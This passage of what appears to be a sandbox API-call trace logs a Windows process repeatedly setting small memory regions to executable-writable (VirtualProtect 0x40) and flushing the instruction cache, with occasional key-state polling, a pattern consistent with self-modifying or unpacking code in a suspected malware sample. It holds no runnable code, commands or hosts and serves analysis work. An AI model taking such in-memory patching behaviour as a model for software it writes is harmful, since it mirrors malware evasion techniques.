lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0112.010] GetCurrentProcess () returned 0xffffffff [0112.010] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0112.010] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.010] GetCurrentProcess () returned 0xffffffff [0112.010] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0112.010] GetCurrentProcess () returned 0xffffffff [0112.010] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0112.010] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.011] GetCurrentProcess () returned 0xffffffff [0112.011] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0112.011] GetCurrentProcess () returned 0xffffffff [0112.011] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0112.011] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.013] GetCurrentProcess () returned 0xffffffff [0112.013] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0112.013] GetCurrentProcess () returned 0xffffffff [0112.013] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0112.013] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.013] GetCurrentProcess () returned 0xffffffff [0112.013] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0112.013] GetCurrentProcess () returned 0xffffffff [0112.013] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0112.013] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.014] GetCurrentProcess () returned 0xffffffff [0112.014] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0112.014] GetCurrentProcess () returned 0xffffffff [0112.014] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0112.014] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.014] GetCurrentProcess () returned 0xffffffff [0112.014] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0112.014] GetCurrentProcess () returned 0xffffffff [0112.015] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0112.015] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.015] GetCurrentProcess () returned 0xffffffff [0112.015] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0112.016] GetAsyncKeyState (vKey=3) returned 0 [0112.016] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.016] CRetailMalloc_Alloc () returned 0xcb953d0 [0112.016] memcpy (in: _Dst=0xd015168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.016] memcpy (in: _Dst=0xcb953f0, _Src=0x197724, _Size=0x18 | out: _Dst=0xcb953f0) returned 0xcb953f0 [0112.016] CRetailMalloc_Realloc () returned 0xcb953d0 [0112.016] CRetailMalloc_Free () returned 0x1 [0112.016] GetCurrentProcess () returned 0xffffffff [0112.016] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0112.016] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.017] GetCurrentProcess () returned 0xffffffff [0112.017] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0112.017] GetCurrentProcess () returned 0xffffffff [0112.017] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0112.017] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.018] GetCurrentProcess () returned 0xffffffff [0112.018] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0112.018] GetCurrentProcess () returned 0xffffffff [0112.018] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0112.018] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.018] GetCurrentProcess () returned 0xffffffff [0112.018] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0112.018] GetCurrentProcess () returned 0xffffffff [0112.018] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0112.018] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.019] GetCurrentProcess () returned 0xffffffff [0112.019] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0112.019] GetCurrentProcess () returned 0xffffffff [0112.019] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0112.019] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.019] GetCurrentProcess () returned 0xffffffff [0112.019] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0112.019] GetCurrentProcess () returned 0xffffffff [0112.019] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0112.019] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.020] GetCurrentProcess () returned 0xffffffff [0112.020] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0112.020] GetCurrentProcess () returned 0xffffffff [0112.020] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0112.020] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.020] GetCurrentProcess () returned 0xffffffff [0112.020] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0112.020] GetCurrentProcess () returned 0xffffffff [0112.020] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0112.020] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.021] GetCurrentProcess () returned 0xffffffff [0112.021] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0112.021] GetCurrentProcess () returned 0xffffffff [0112.021] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0112.021] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.021] GetCurrentProcess () returned 0xffffffff [0112.021] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0112.021] GetCurrentProcess () returned 0xffffffff [0112.021] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0112.021] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.021] GetCurrentProcess () returned 0xffffffff [0112.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0112.022] GetCurrentProcess () returned 0xffffffff [0112.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0112.022] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.022] GetCurrentProcess () returned 0xffffffff [0112.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0112.022] GetCurrentProcess () returned 0xffffffff [0112.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0112.022] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.022] GetCurrentProcess () returned 0xffffffff [0112.023] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0112.023] GetCurrentProcess () returned 0xffffffff [0112.023] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0112.023] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.023] GetCurrentProcess () returned 0xffffffff [0112.023] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0112.023] GetCurrentProcess () returned 0xffffffff [0112.023] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0112.023] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.025] GetCurrentProcess () returned 0xffffffff [0112.025] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0112.025] GetCurrentProcess () returned 0xffffffff [0112.025] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0112.025] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.026] GetCurrentProcess () returned 0xffffffff [0112.026] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0112.026] GetCurrentProcess () returned 0xffffffff [0112.026] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0112.026] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.026] GetCurrentProcess () returned 0xffffffff [0112.026] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0112.026] GetCurrentProcess () returned 0xffffffff [0112.026] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0112.026] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.027] GetCurrentProcess () returned 0xffffffff [0112.027] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0112.027] GetCurrentProcess () returned 0xffffffff [0112.027] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0112.027] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.027] GetCurrentProcess () returned 0xffffffff [0112.027] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0112.027] GetCurrentProcess () returned 0xffffffff [0112.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0112.028] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.028] GetCurrentProcess () returned 0xffffffff [0112.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0112.028] GetCurrentProcess () returned 0xffffffff [0112.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0112.028] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.028] GetCurrentProcess () returned 0xffffffff [0112.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0112.028] GetCurrentProcess () returned 0xffffffff [0112.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0112.029] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.029] GetCurrentProcess () returned 0xffffffff [0112.029] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0112.029] GetCurrentProcess () returned 0xffffffff [0112.029] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0112.029] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.029] GetCurrentProcess () returned 0xffffffff [0112.029] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0112.029] GetCurrentProcess () returned 0xffffffff [0112.029] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0112.029] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.030] GetCurrentProcess () returned 0xffffffff [0112.030] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0112.030] GetCurrentProcess () returned 0xffffffff [0112.030] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0112.030] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.030] GetCurrentProcess () returned 0xffffffff [0112.030] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0112.030] GetCurrentProcess () returned 0xffffffff [0112.030] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0112.030] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.031] GetCurrentProcess () returned 0xffffffff [0112.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0112.031] GetCurrentProcess () returned 0xffffffff [0112.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0112.031] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.031] GetCurrentProcess () returned 0xffffffff [0112.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0112.031] GetCurrentProcess () returned 0xffffffff [0112.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0112.031] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.032] GetCurrentProcess () returned 0xffffffff [0112.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0112.032] GetCurrentProcess () returned 0xffffffff [0112.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0112.032] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.033] GetCurrentProcess () returned 0xffffffff [0112.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0112.033] GetCurrentProcess () returned 0xffffffff [0112.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0112.033] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.033] GetCurrentProcess () returned 0xffffffff [0112.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0112.033] GetCurrentProcess () returned 0xffffffff [0112.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0112.033] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.035] GetCurrentProcess () returned 0xffffffff [0112.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0112.035] GetCurrentProcess () returned 0xffffffff [0112.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0112.035] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.035] GetCurrentProcess () returned 0xffffffff [0112.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0112.036] GetAsyncKeyState (vKey=3) returned 0 [0112.036] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.036] CRetailMalloc_Alloc () returned 0xcc1aee8 [0112.036] memcpy (in: _Dst=0xd015168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.036] memcpy (in: _Dst=0xcc1af08, _Src=0x197724, _Size=0x18 | out: _Dst=0xcc1af08) returned 0xcc1af08 [0112.037] CRetailMalloc_Realloc () returned 0xcc1aee8 [0112.037] CRetailMalloc_Free () returned 0x1 [0112.037] GetCurrentProcess () returned 0xffffffff [0112.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0112.037] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.037] GetCurrentProcess () returned 0xffffffff [0112.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0112.037] GetCurrentProcess () returned 0xffffffff [0112.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0112.037] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.038] GetCurrentProcess () returned 0xffffffff [0112.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0112.038] GetCurrentProcess () returned 0xffffffff [0112.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0112.038] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.038] GetCurrentProcess () returned 0xffffffff [0112.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0112.038] GetCurrentProcess () returned 0xffffffff [0112.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0112.038] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.039] GetCurrentProcess () returned 0xffffffff [0112.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0112.039] GetCurrentProcess () returned 0xffffffff [0112.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0112.039] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.039] GetCurrentProcess () returned 0xffffffff [0112.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0112.039] GetCurrentProcess () returned 0xffffffff [0112.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0112.039] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.040] GetCurrentProcess () returned 0xffffffff [0112.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0112.040] GetCurrentProcess () returned 0xffffffff [0112.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0112.040] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.040] GetCurrentProcess () returned 0xffffffff [0112.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0112.040] GetCurrentProcess () returned 0xffffffff [0112.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0112.040] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.041] GetCurrentProcess () returned 0xffffffff [0112.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0112.041] GetCurrentProcess () returned 0xffffffff [0112.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0112.041] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.041] GetCurrentProcess () returned 0xffffffff [0112.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0112.041] GetCurrentProcess () returned 0xffffffff [0112.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0112.041] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.042] GetCurrentProcess () returned 0xffffffff [0112.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0112.042] GetCurrentProcess () returned 0xffffffff [0112.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0112.042] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.042] GetCurrentProcess () returned 0xffffffff [0112.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0112.042] GetCurrentProcess () returned 0xffffffff [0112.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0112.042] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.043] GetCurrentProcess () returned 0xffffffff [0112.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0112.043] GetCurrentProcess () returned 0xffffffff [0112.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0112.043] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.043] GetCurrentProcess () returned 0xffffffff [0112.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0112.043] GetCurrentProcess () returned 0xffffffff [0112.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0112.043] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.044] GetCurrentProcess () returned 0xffffffff [0112.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0112.044] GetCurrentProcess () returned 0xffffffff [0112.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0112.044] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.044] GetCurrentProcess () returned 0xffffffff [0112.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0112.044] GetCurrentProcess () returned 0xffffffff [0112.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0112.044] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.045] GetCurrentProcess () returned 0xffffffff [0112.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0112.045] GetCurrentProcess () returned 0xffffffff [0112.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0112.045] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.045] GetCurrentProcess () returned 0xffffffff [0112.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) 